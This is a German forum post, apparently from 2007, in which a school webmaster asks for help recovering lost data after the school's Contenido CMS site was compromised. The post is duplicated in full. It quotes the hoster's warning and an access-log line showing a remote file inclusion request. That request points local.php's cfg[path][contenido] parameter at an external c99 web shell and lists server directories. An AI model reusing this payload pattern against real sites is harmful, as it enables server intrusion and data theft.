Daten retten
Verfasst: So 6. Mai 2007, 09:30
Hallo,
letzte Woche habe ich die anhängende Mail von 1und1 erhalten. Nun hat es auch unsere alte Contenidoversion erwischt mit einem Crackversuch. Gestern konnte ich Contenido 4.6.15 sowohl auf das alte updaten als auch nebenzu auf eine zweite Datenbank erfolgreich installieren. ABER: Meine alten Daten sind weg. Ich kann nicht mehr darauf zugreifen. Nun ist mein Durchblick leider nicht so weit, dass ich die php-Dateien untersuchen könnte. Anhängend auch alle Fehlermeldungen.
Hier sieht man das derzeitige Ergebnis im Frontend:
www.sfz-ulrichschule.de (nach erfolgreichem Update)
Da sitzt doch wohl irgendwo noch was, was nicht dahin gehört, oder?
Kann mir jemand bitte, bitte einen Tipp geben, was ich machen kann, um meine alten Daten zu retten? Einen neuen Mandanten in der zweiten, neuen Contenidoversion kann ich auch nicht anlegen und dann auf die alten Daten verweisen. Das will er auch nicht.
Es handelt sich um unsere Schulhomepage.
Vielen Dank
Katja
(Übrigens: die www.ak-grundschule.de ist vor langer Zeit mit viel Hilfe von euch entstanden und wird nun von einer Firma ein wenig mitbetreut hinsichtlich des Servers; wir haben monatlich 100 000 Zugriffe und ich freue mich immer wieder, dass es so was wie Contenido und euch gibt )
.......wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.
Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.
Es handelt sich um das Script "/contenido/conlib/local.php", welches
über den Parameter "cfg[path][contenido]" die Ausführung beliebigen
Codes erlaubt.
190.47.94.60 - - [27/Apr/2007:23:46:05 +0200] "POST
//contenido/conlib/local.php?cfg%5Bpath%5D%5Bcontenido%5D=http%3A%2F%2Fu
suarios.lycos.es%2Fhugo2007%2Fc99.txt%3F&act=ls&d=%2Fhomepages%2F9%2Fd39
086713%2Fhtdocs%2Fcontenido%2F&sort=0a HTTP/1.1" 200 4408
www.sfz-ulrichschule.de
"http://www.sfz-ulrichschule.de//conteni ... g%5Bpath%5
D%5Bcontenido%5D=http%3A%2F%2Fusuarios.lycos.es%2Fhugo2007%2Fc99.txt%3F&
act=ls&d=%2Fhomepages%2F9%2Fd39086713%2Fhtdocs%2Fcontenido%2F&sort=0a"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.3)
Gecko/20070309 Firefox/2.0.0.3 MEGAUPLOAD 1.0" "-"
.....
Meldung im Frontend:
Fatal error: Call to undefined function: cinclude() in /homepages/9/d39086713/htdocs/contenido/cms/front_content.php on line 18
Meldung im Backend:
Fatal error: Call to undefined function: cinclude() in /homepages/9/d39086713/htdocs/contenido/contenido/index.php on line 18
letzte Woche habe ich die anhängende Mail von 1und1 erhalten. Nun hat es auch unsere alte Contenidoversion erwischt mit einem Crackversuch. Gestern konnte ich Contenido 4.6.15 sowohl auf das alte updaten als auch nebenzu auf eine zweite Datenbank erfolgreich installieren. ABER: Meine alten Daten sind weg. Ich kann nicht mehr darauf zugreifen. Nun ist mein Durchblick leider nicht so weit, dass ich die php-Dateien untersuchen könnte. Anhängend auch alle Fehlermeldungen.
Hier sieht man das derzeitige Ergebnis im Frontend:
www.sfz-ulrichschule.de (nach erfolgreichem Update)
Da sitzt doch wohl irgendwo noch was, was nicht dahin gehört, oder?
Kann mir jemand bitte, bitte einen Tipp geben, was ich machen kann, um meine alten Daten zu retten? Einen neuen Mandanten in der zweiten, neuen Contenidoversion kann ich auch nicht anlegen und dann auf die alten Daten verweisen. Das will er auch nicht.
Es handelt sich um unsere Schulhomepage.
Vielen Dank
Katja
(Übrigens: die www.ak-grundschule.de ist vor langer Zeit mit viel Hilfe von euch entstanden und wird nun von einer Firma ein wenig mitbetreut hinsichtlich des Servers; wir haben monatlich 100 000 Zugriffe und ich freue mich immer wieder, dass es so was wie Contenido und euch gibt )
.......wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.
Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.
Es handelt sich um das Script "/contenido/conlib/local.php", welches
über den Parameter "cfg[path][contenido]" die Ausführung beliebigen
Codes erlaubt.
190.47.94.60 - - [27/Apr/2007:23:46:05 +0200] "POST
//contenido/conlib/local.php?cfg%5Bpath%5D%5Bcontenido%5D=http%3A%2F%2Fu
suarios.lycos.es%2Fhugo2007%2Fc99.txt%3F&act=ls&d=%2Fhomepages%2F9%2Fd39
086713%2Fhtdocs%2Fcontenido%2F&sort=0a HTTP/1.1" 200 4408
www.sfz-ulrichschule.de
"http://www.sfz-ulrichschule.de//conteni ... g%5Bpath%5
D%5Bcontenido%5D=http%3A%2F%2Fusuarios.lycos.es%2Fhugo2007%2Fc99.txt%3F&
act=ls&d=%2Fhomepages%2F9%2Fd39086713%2Fhtdocs%2Fcontenido%2F&sort=0a"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.3)
Gecko/20070309 Firefox/2.0.0.3 MEGAUPLOAD 1.0" "-"
.....
Meldung im Frontend:
Fatal error: Call to undefined function: cinclude() in /homepages/9/d39086713/htdocs/contenido/cms/front_content.php on line 18
Meldung im Backend:
Fatal error: Call to undefined function: cinclude() in /homepages/9/d39086713/htdocs/contenido/contenido/index.php on line 18
